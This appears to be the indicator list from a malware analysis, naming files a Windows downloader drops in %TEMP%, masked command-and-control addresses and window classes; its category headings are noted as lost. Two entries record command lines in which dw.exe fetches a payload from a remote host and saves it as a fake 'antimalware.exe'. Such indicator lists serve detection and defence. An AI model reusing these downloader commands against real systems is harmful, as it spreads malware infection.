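Technical Information
(Note: the category headings for the entries below appear to have been lost in extraction, so repeated entries may have belonged to different categories. The '#' characters in the IP addresses appear to be deliberate masking by the publisher, not literal address characters.)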
- '%TEMP%\dw.exe' http://11#.#0.103.253/Main/ishosting.gif "%TEMP%\antimalware.exe"
- '%TEMP%\antimalware.exe'
- '%TEMP%\loadzinho.exe'
- '%TEMP%\dw.exe' http://20#.#4.172.28/cirus.php %USERNAME%.tmp
- '%TEMP%\antimalware.exe' (downloaded from the Internet)
- %TEMP%\%USERNAME%2.dll
- %TEMP%\%USERNAME%.tmp
- %TEMP%\antimalware.exe
- %TEMP%\zurique.dat
- %TEMP%\loadzinho.exe
- %TEMP%\dw.exe
- %TEMP%\2820ULP4.bat
- %TEMP%\2820ULP4.bat
- %TEMP%\2820ULP4.bat
- '11#.#0.103.253':80
- '20#.#4.172.28':80
- 11#.#0.103.253/Main/ishosting.gif
- 20#.#4.172.28/cirus.php
- ClassName: 'Shell_TrayWnd' WindowName: '(null)'
- ClassName: 'EDIT' WindowName: '(null)'